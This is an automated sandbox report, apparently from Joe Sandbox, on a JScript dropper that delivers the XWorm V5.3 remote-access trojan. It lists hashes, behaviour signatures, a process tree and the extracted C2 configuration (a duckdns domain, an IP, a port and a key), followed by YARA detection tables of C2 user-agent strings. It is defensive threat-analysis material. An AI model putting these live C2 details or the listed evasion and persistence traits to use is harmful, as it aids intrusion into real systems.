Edit tour

Windows Analysis Report
cc.js

Overview

General Information

Sample name:	cc.js
Analysis ID:	1523189
MD5:	c63888086e1646654a1e162fde69c0ff
SHA1:	8580dafbffe4d9b0d7e122127a455682ad2bd30e
SHA256:	262fb2e45f9b66956236f89f4cbeac22ee3d011832263a28ed7f632a22ae87d7
Tags:	192-210-215-11jsuser-JAMESWT_MHT
Infos:

Detection

XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Benign windows process drops PE files

Found malware configuration

JScript performs obfuscated calls to suspicious functions

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected XWorm

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

C2 URLs / IPs found in malware configuration

Contains functionality to disable the Task Manager (.Net Source)

Creates multiple autostart registry keys

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Sample uses string decryption to hide its real strings

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: WScript or CScript Dropper

Uses dynamic DNS services

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Yara signature match

Classification

Process Tree

System is w10x64

wscript.exe (PID: 1776 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\cc.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

GeUT.exe (PID: 3784 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)

GeUT.exe (PID: 5512 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)

GeUT.exe (PID: 3516 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)

GeUT.exe (PID: 4948 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)

GeUT.exe (PID: 5916 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)

GeUT.exe (PID: 5156 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)

GeUT.exe (PID: 4976 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)

GeUT.exe (PID: 716 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)

Service.exe (PID: 7072 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: 7284765CA4D2F85C487796F437B01822)

Service.exe (PID: 4080 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: 7284765CA4D2F85C487796F437B01822)

Service.exe (PID: 6696 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: 7284765CA4D2F85C487796F437B01822)

Service.exe (PID: 4568 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: 7284765CA4D2F85C487796F437B01822)

Service.exe (PID: 1088 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: 7284765CA4D2F85C487796F437B01822)

Service.exe (PID: 2444 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: 7284765CA4D2F85C487796F437B01822)

GeUT.exe (PID: 1320 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)

GeUT.exe (PID: 6552 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)

GeUT.exe (PID: 2404 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)

GeUT.exe (PID: 3172 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)

GeUT.exe (PID: 5968 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)

GeUT.exe (PID: 5004 cmdline: "C:\Users\user\AppData\Local\Temp\GeUT.exe" MD5: 7284765CA4D2F85C487796F437B01822)

Service.exe (PID: 2940 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: 7284765CA4D2F85C487796F437B01822)

Service.exe (PID: 1776 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: 7284765CA4D2F85C487796F437B01822)

Service.exe (PID: 4800 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: 7284765CA4D2F85C487796F437B01822)

Service.exe (PID: 6976 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: 7284765CA4D2F85C487796F437B01822)

Service.exe (PID: 1020 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: 7284765CA4D2F85C487796F437B01822)

Service.exe (PID: 5144 cmdline: "C:\Users\user\AppData\Roaming\Service.exe" MD5: 7284765CA4D2F85C487796F437B01822)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["as525795.duckdns.org", "194.37.97.150"], "Port": "6980", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "adobe.exe", "Version": "XWorm V5.3"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.2282391567.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000005.00000002.2282391567.0000000000402000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x97ec:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x9889:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x999e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x8ff0:$cnc4: POST / HTTP/1.1
00000004.00000002.2255004351.0000000003359000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000004.00000002.2255004351.0000000003359000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x2e488:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x396cc:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x44928:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x50090:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x78ee8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x8412c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x8f388:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x9aaf0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xc3948:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xceb8c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xd9de8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xe5550:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x10e3b4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1195f8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x124854:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x12ffbc:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x2e525:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x39769:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x449c5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x5012d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x78f85:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
00000002.00000002.2147849334.00000000027F1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000002.00000002.2147849334.00000000027F1000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x55da0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x60fe4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6c240:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x77bb0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x55e3d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x61081:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6c2dd:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x77c4d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x55f52:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x61196:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6c3f2:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x77d62:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x555a4:$cnc4: POST / HTTP/1.1 0x607e8:$cnc4: POST / HTTP/1.1 0x6ba44:$cnc4: POST / HTTP/1.1 0x773b4:$cnc4: POST / HTTP/1.1
0000000B.00000002.2338909006.0000000002891000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000000B.00000002.2338909006.0000000002891000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x55da4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x60fe8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6c244:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x77bb4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xa648c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xb16d0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xbc92c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xc8094:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xf0eec:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xfc130:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x10738c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x112af4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x13b94c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x146b90:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x151dec:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x15d554:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1863b8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1915fc:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x19c858:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1a7fc0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x55e41:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
Process Memory Space: GeUT.exe PID: 3784	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: GeUT.exe PID: 3516	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: GeUT.exe PID: 4948	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: Service.exe PID: 7072	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Click to see the 7 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.GeUT.exe.400000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
5.2.GeUT.exe.400000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x99ec:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x9a89:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x9b9e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x91f0:$cnc4: POST / HTTP/1.1
2.2.GeUT.exe.28363bc.0.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
2.2.GeUT.exe.28363bc.0.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x109e4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1bc28:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x26e84:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x327f4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x10a81:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x1bcc5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x26f21:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x32891:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x10b96:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x1bdda:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x27036:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x329a6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x101e8:$cnc4: POST / HTTP/1.1 0x1b42c:$cnc4: POST / HTTP/1.1 0x26688:$cnc4: POST / HTTP/1.1 0x31ff8:$cnc4: POST / HTTP/1.1
2.2.GeUT.exe.2838018.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
2.2.GeUT.exe.2838018.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xed88:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x19fcc:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x25228:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x30b98:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xee25:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x1a069:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x252c5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x30c35:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xef3a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x1a17e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x253da:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x30d4a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xe58c:$cnc4: POST / HTTP/1.1 0x197d0:$cnc4: POST / HTTP/1.1 0x24a2c:$cnc4: POST / HTTP/1.1 0x3039c:$cnc4: POST / HTTP/1.1
2.2.GeUT.exe.2834784.2.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
2.2.GeUT.exe.2834784.2.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x1261c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1d860:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x28abc:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x3442c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x126b9:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x1d8fd:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x28b59:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x344c9:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x127ce:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x1da12:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x28c6e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x345de:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x11e20:$cnc4: POST / HTTP/1.1 0x1d064:$cnc4: POST / HTTP/1.1 0x282c0:$cnc4: POST / HTTP/1.1 0x33c30:$cnc4: POST / HTTP/1.1
4.2.GeUT.exe.3376aa4.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
4.2.GeUT.exe.3376aa4.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x109e4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1bc28:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x26e84:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x325ec:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x5b444:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x66688:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x718e4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7d04c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xa5ea4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xb10e8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xbc344:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xc7aac:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xf0910:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xfbb54:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x106db0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x112518:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x10a81:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x1bcc5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x26f21:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x32689:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x5b4e1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
4.2.GeUT.exe.3374e60.3.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
4.2.GeUT.exe.3374e60.3.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x12628:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1d86c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x28ac8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x34230:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x5d088:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x682cc:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x73528:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7ec90:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xa7ae8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xb2d2c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xbdf88:$cnc1: Mozilla/5.0 (Windows NT 6.1; 